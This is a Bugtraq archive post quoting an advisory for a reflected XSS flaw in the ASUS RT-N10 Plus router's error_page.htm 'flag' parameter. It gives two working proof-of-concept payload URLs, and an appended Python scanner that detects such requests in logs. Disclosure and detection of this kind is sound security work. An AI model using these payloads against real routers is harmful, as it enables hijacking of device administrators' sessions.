Bugtraq mailing list archives
Re: CVE-2015-1437 XSS In ASUS Router.
From: Michael Meyer <micha () komma-nix de>
Date: Wed, 4 Feb 2015 14:44:49 +0100
*** kingkaustubh () me com wrote:
#####################################
Title:- Reflected XSS vulnerability in Asus RT-N10 Plus router
Author: Kaustubh G. Padwad
Product: ASUS Router RT-N10 Plus
Firmware: 2.1.1.1.70
Severity: HIGH
Auth: Not required
CVE ID: CVE-2015-1437

# Description:
Vulnerable Parameter: flag=

# Vulnerability Class:
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
[...]
Enter this URL
1. http://router/error_page.htm?flag=initial78846%27%3balert(document.lastmodified)%2f%2f372137b5d
2. http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d

https://sintonen.fi/advisories/asus-router-auth-bypass.txt

Micha
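
A defender-side check for the request pattern reported in this thread, as an added example that is not part of the original messages: it scans proxy or access log lines for `error_page.htm` requests whose percent-decoded `flag` value falls outside an allowlist. The log format, the allowlist, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate flag values are short alphanumeric tokens. The thread
# does not list the valid values, so tune this allowlist for your firmware.
SAFE_FLAG = re.compile(r"[A-Za-z0-9_]{0,32}")
# Characters that let a value leave a quoted JavaScript string or HTML attribute.
BREAKOUT = set("'\"<>;()/\\`")


def check_request(url):
    """Return None if the request looks benign, else a dict describing the flag value."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/error_page.htm"):
        return None
    # parse_qs percent-decodes, so %27 and %3b are inspected as ' and ;
    for value in parse_qs(parts.query, keep_blank_values=True).get("flag", []):
        if SAFE_FLAG.fullmatch(value):
            continue
        return {"url": url, "flag": value,
                "breakout_chars": sorted(BREAKOUT.intersection(value))}
    return None


def scan(log_lines):
    """Return findings for log lines of the assumed form 'client METHOD url'."""
    findings = []
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # malformed line, nothing to inspect
        hit = check_request(fields[2])
        if hit:
            hit["client"] = fields[0]
            findings.append(hit)
    return findings


# Constructed sample log lines (not from the thread), in a simplified format.
SAMPLE_LOG = [
    "192.0.2.10 GET http://router/error_page.htm?flag=initial",
    "192.0.2.11 GET http://router/error_page.htm?flag=x%27%3bprobe()%2f%2f",
    "192.0.2.12 GET http://router/index.asp?flag=%27",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```
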